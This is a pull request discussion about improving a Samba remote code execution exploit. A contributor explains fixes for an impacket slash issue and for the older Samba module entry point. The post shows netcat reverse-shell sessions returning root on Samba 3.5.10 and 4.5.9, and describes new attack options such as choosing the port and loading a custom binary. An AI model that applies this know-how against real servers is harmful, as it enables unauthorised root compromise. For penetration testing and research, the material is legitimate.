Some update

[archivaldo]

Hello!,
I was trying to test your exploit, but I have found some problems.

the first one was related to impacket and the way the library handle slashes.
You can read more about this in this issue.
https://github.com/CoreSecurity/impacket/issues/308
Having in mind that you have a local version of impacket, I just # the line generating the problem and everything is working fine.

the second problem was:
https://marc.info/?l=samba-technical&m=132534986404085
In this commit from 2011 the samba team has changed the entry point from init_samba_module to samba_init_module, so your exploit doesn't work on samba version 3.5.* and 3.6.*.
The fix was also simple.

samba 3.5.10 / lx x86

root@WorkStation:/# nc -l -p 1337
whoami; uname -a; /usr/sbin/smbd -V
root
Linux localhost 2.6.32-696.16.1.el6.i686 #1 SMP Wed Nov 15 16:16:47 UTC 2017 i686 i686 i386 GNU/Linux
Version 3.5.10

samba 4.5.9 / lx x64

root@WorkStation:/opt/bp0/smbmap# nc -l -p 1337
uname -a; whoami; /sbin/smbd -V
Linux localhost.localdomain 3.6.11-7.fc16.x86_64 #1 SMP Fri Feb 8 19:33:57 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
root
Version 4.5.9

I also made some changes (and add new ones) in arguments to make it more user friendly.

--no-compile
this options will disable the compilation of implant.c. The reason for this one was, if you are attacking a samba server from a x86 machine, te compilation script is going to create two x86 binaries overwriting the current binaries. Using this option, you can compile your x64 binary in another machine and use your x86 machine to run the attack.

--port
Samba could have port 445 closed and you need to target port 139.

--old-version
Use the old entry point for samba .so. If this options is not used, the script will use the new entry point.

--custom-binary
Some times you need to use your own custom binary to be loaded on the server.

that's all, have a nice day. :)

[joxeankoret]

Thanks a lot for your PR! I love it.